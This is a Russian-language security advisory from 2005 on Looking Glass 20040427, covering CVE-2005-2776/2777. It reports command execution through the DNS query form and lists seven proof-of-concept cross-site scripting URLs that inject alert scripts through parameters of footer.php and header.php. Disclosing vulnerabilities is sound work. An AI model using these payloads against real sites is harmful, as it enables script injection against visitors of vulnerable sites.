Выполнение произвольный команд и межсайтовый скриптинг в Looking Glass

Дата публикации:
30.08.2005
Дата изменения:
30.08.2005
Всего просмотров:
1499
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2777
CVE-2005-2776
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Looking Glass
Уязвимые версии: Looking Glass 20040427

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные команды на целевой системе.

Программное обеспечение недостаточной обрабатывает входные данные в поле формы DNS запроса. Удаленный пользователь может с помощью специально сформированного значения параметра выполнить произвольные команды на целевой системе с привилегиями web севера.

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[path]/footer.php?version[fullname]
=</a>< script>alert('lol')</script>

http://[target]/[path]/footer.php?version
[homepage]="><script>alert('lol')</script>

http://[target]/[path]/footer.php?version
[no]=<script>a lert('lol')</script>

http://[target]/[path]/header.php?version
[fullname]=<script>alert('lol')</script>

http://[target]/[path]/header.php?version
[no]=</title><script>ale rt('lol')</script>

http://[target]/[path]/header.php?version
[author]=--><script>alert('lol')</script>

http://[target]/[path]/header.php?version
[email]=--><script>alert( 'lol')</script>

URL производителя: de-neef.net/articles.php?id=2&page=1

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Looking Glass v20040427 arbitrary commands execution / cross site scripting

или введите имя

CAPTCHA